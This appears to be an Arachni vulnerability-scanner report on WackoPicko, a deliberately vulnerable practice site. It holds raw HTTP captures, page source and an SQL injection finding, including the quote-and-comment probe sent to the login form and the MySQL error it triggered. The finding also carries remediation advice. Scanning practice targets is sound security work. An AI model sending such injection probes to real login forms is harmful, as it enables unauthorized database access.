src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" /> </form> </div> </div> <div class="column prepend-1 span-24 first last"> <h2>Welcome to WackoPicko</h2> <p> On WackoPicko, you can share all your crazy pics with your friends. <br /> But that's not all, you can also buy the rights to the high quality <br /> version of someone's pictures. WackoPicko is fun for the whole family. </p> <h3>New Here?</h3> <p> <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4> </p> <p> <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4> </p> <p> <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4> </p> <p> <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br /> <script> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>'); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </p> </div> <div class="column span-24 first last" id="footer" > <ul> <li><a href="/WackoPicko/">Home</a> |</li> <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li> <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li> <li><a href="/WackoPicko/tos.php">Terms of Service</a></li> </ul> </div> </div> </body> </html> |
Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.
| # | Time | Event | Element | Options | ||
|---|---|---|---|---|---|---|
| 0 | 3.950414 | load |
page
|
|
||
| 1 | 2.996451 | request |
http://192.168.0.26/WackoPicko/ |
|
||
| 2 | 0.337047 | request |
http://192.168.0.26/WackoPicko/css/stylings.php |
|
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5 Accept-Language: en-CA,*
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:48 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 | <html><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection"> <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]--> <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen"> <title>WackoPicko.com</title> </head> <body> <div class="container " style="border: 2px solid #5c95cf;"> <div class="column span-24 first last"> <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1> </div> <div id="menu"> <div class="column prepend-1 span-14 first"> <ul class="menu"> <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li> <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li> <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li> <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li> </ul> </div> <div class="column prepend-1 span-7 first last"> <ul class="menu top_login"> <li><a href="/WackoPicko/users/login.php"><span>Login</span></a></li> </ul> </div> </div> <div class="column span-24 first last" id="search_bar_blue"> <div class="column prepend-17 span-7 first last" id="search_box"> <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;"> <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""> <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;"> </form> </div> </div> <div class="column prepend-1 span-24 first last"> <h2>Welcome to WackoPicko</h2> <p> On WackoPicko, you can share all your crazy pics with your friends. <br> But that's not all, you can also buy the rights to the high quality <br> version of someone's pictures. WackoPicko is fun for the whole family. </p> <h3>New Here?</h3> <p> </p><h4><a href="/WackoPicko/users/register.php">Create an account</a></h4> <p></p> <p> </p><h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4> <p></p> <p> </p><h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4> <p></p> <p> </p><h4>Or you can test to see if WackoPicko can handle a file:</h4> <br> <script> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>'); </script><form enctype="multipart/form-data" action="/WackoPicko/piccheck.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000">Check this file: <input name="userfile" type="file"> <br>With this name: <input name="name" type="text"> <br> <br><input type="submit" value="Send File"><br> </form> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <p></p> </div> <div class="column span-24 first last" id="footer"> <ul> <li><a href="/WackoPicko/">Home</a> |</li> <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li> <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li> <li><a href="/WackoPicko/tos.php">Terms of Service</a></li> </ul> </div> </div> </body></html> |
This is the original HTTP response body.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 | <script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <html> <head> <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection"> <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]--> <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen"> <title>WackoPicko.com</title> </head> <body> <div class="container " style="border: 2px solid #5c95cf;"> <div class="column span-24 first last"> <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1> </div> <div id="menu"> <div class="column prepend-1 span-14 first"> <ul class="menu"> <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li> <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li> <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li> <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li> </ul> </div> <div class="column prepend-1 span-7 first last"> <ul class="menu top_login" > <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li> </ul> </div> </div> <div class="column span-24 first last" id="search_bar_blue"> <div class="column prepend-17 span-7 first last" id="search_box"> <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;"> <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/> <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" /> </form> </div> </div> <div class="column prepend-1 span-24 first last"> <h2>Welcome to WackoPicko</h2> <p> On WackoPicko, you can share all your crazy pics with your friends. <br /> But that's not all, you can also buy the rights to the high quality <br /> version of someone's pictures. WackoPicko is fun for the whole family. </p> <h3>New Here?</h3> <p> <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4> </p> <p> <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4> </p> <p> <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4> </p> <p> <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br /> <script> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>'); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </p> </div> <div class="column span-24 first last" id="footer" > <ul> <li><a href="/WackoPicko/">Home</a> |</li> <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li> <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li> <li><a href="/WackoPicko/tos.php">Terms of Service</a></li> </ul> </div> </div> </body> </html> |
form
with inputs
comment
name
using
GET
at
http://192.168.0.26/WackoPicko/guestbook/
pointing to
http://192.168.0.26/WackoPicko/guestbook.php
.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | <form action="/WackoPicko/guestbook.php" method="POST"> Name: <br> </br> <input type="text" name="name"> </input> <br> </br> Comment: <br> </br> <textarea id="comment-box" name="comment"> </textarea> <br> </br> <input type="submit" value="Submit"> </input> </form> |
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
form |
http://192.168.0.26/WackoPicko/guestbook/ | http://192.168.0.26/WackoPicko/guestbook.php |
|
|
Raw HTTP request used to retrieve the page.
GET /WackoPicko/guestbook/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 978
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>
<p class="comment">Hi, I love your site!</p>
<p> - by adam </p>
<form action="/WackoPicko/guestbook.php" method="POST">
Name: <br>
<input type="text" name="name" /><br>
Comment: <br>
<textarea id="comment-box" name="comment"></textarea> <br>
<input type="submit" value="Submit" />
</form>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/guestbook/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 978
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>
<p class="comment">Hi, I love your site!</p>
<p> - by adam </p>
<form action="/WackoPicko/guestbook.php" method="POST">
Name: <br>
<input type="text" name="name" /><br>
Comment: <br>
<textarea id="comment-box" name="comment"></textarea> <br>
<input type="submit" value="Submit" />
</form>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
Due to the requirement for dynamic content of today’s web applications, many rely on a database backend to store data that will be called upon and processed by the web application (or other programs). Web applications retrieve data from the database by using Structured Query Language (SQL) queries.
To meet demands of many developers, database servers (such as MSSQL, MySQL, Oracle etc.) have additional built-in functionality that can allow extensive control of the database and interaction with the host operating system itself.
An SQL injection occurs when a value originating from the client’s request is used within a SQL query without prior sanitisation. This could allow cyber-criminals to execute arbitrary SQL code and steal data or use the additional functionality of the database server to take control of more server components.
The successful exploitation of a SQL injection can be devastating to an organisation and is one of the most commonly exploited web application vulnerabilities.
This injection was detected as Arachni was able to cause the server to respond to the request with a database related error.
The only proven method to prevent against SQL injection attacks while still maintaining full application functionality is to use parameterized queries (also known as prepared statements). When utilising this method of querying the database, any value supplied by the client will be handled as a string value rather than part of the SQL query.
Additionally, when utilising parameterized queries, the database engine will automatically check to make sure the string being used matches that of the column. For example, the database engine will check that the user supplied input is an integer if the database column is configured to contain integers.
form
input
username
using
POST
at
http://192.168.0.26/WackoPicko/users/login.php
pointing to
http://192.168.0.26/WackoPicko/users/login.php
.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 | <form action="/WackoPicko/users/login.php" method="POST"> <tr> <td> Username : </td> <td> <input type="text" name="username"> </input> </td> </tr> <tr> <td> Password : </td> <td> <input type="password" name="password"> </input> </td> </tr> <tr> <td> <input type="submit" value="login"> </input> </td> <td> <a href="/WackoPicko/users/register.php"> Register </a> </td> </tr> </form> |
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
form |
http://192.168.0.26/WackoPicko/users/login.php | http://192.168.0.26/WackoPicko/users/login.php |
|
|
Raw HTTP request used to retrieve the page.
POST /WackoPicko/users/login.php HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=decslc8vmakk398sqkq9619t72 Content-Length: 66 Content-Type: application/x-www-form-urlencoded username=arachni_name%22%27%60--&password=5543%21%25arachni_secret
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:50:55 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 194
Content-Type: text/html
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '`--' and `password` = SHA1( CONCAT('5543!%arachni_secret', `salt`)) limit 1' at line 1
Raw HTTP request used to retrieve the page.
GET /WackoPicko/users/login.php HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 303 See Other
Date: Mon, 06 Aug 2018 22:50:41 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /WackoPicko/users/login.php
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Content-Type: text/html
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:50:41 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 958
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
